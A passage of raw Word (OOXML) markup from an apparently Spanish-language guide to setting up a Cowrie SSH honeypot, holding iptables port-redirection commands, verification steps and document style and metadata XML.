        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  iptables -t "$table" -C "$chain" "$@" 2&gt;/dev/null || iptables -t "$table" -I "$chain" 1 "$@"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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info "Aplicando la redireccion 22 -&gt; 2222..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tras PREROUTING el paquete llega a INPUT con destino 2222, por eso el</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># firewall del host debe aceptar el 2222 aunque el proveedor solo exponga el 22.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure filter INPUT -p tcp --dport 2222 -m conntrack --ctstate NEW -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ensure nat PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">netfilter-persistent save</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info "Reglas activas:"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -t nat -S PREROUTING | grep 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables -S INPUT | grep -E -- '--dport (2022|2222)'</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cat &lt;&lt;EOF</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El honeypot ya es publico en el puerto 22.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  Comprobacion desde fuera:  ssh root@&lt;IP_PUBLICA&gt;   -&gt; debe verse web-prod-02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  Administracion:            ssh -p 2022 ${SUDO_USER:-&lt;tu_usuario&gt;}@&lt;IP_PUBLICA&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  Ver ataques en directo:    sudo tail -f /home/cowrie/honeypot/var/log/cowrie/cowrie.json</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200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:pgSz w:w="11907" w:h="16840" w:orient="portrait"/>
      <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="708" w:footer="708" w:gutter="567"/>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line="36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240" w:before="240" w:line="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="240" w:before="240" w:line="360"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="240" w:before="240" w:line="360"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>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theme" Target="theme/theme1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0c41b619a055730ae38a6f74f223364bfd772752.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f22b3480f8213f55188ef00d10cb3ee0dcc2f3f8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8c5d785f228ee858a33662d3c7f048f986ec5441.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/e83f0c2f146863cc110dd3419d0c5e431b0e04ab.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/311b2477f93a29a241aea4993525303420a4b1ba.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/73fc8f75f92681805b412ffc0c863be432f60292.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/254d22cae34c658ae98c61b497d5f2bb8de56b0b.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bc215cd4c44e3c7ecf23ec0db659680f7e5e58cb.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/65292651bd9f979db4d9445f68784ef779d6a6cf.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/32ae50da8652181673ae74cb944c0ef47dbe6d78.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2026-10-08T18:37:10.745Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-08T18:37:10.745Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>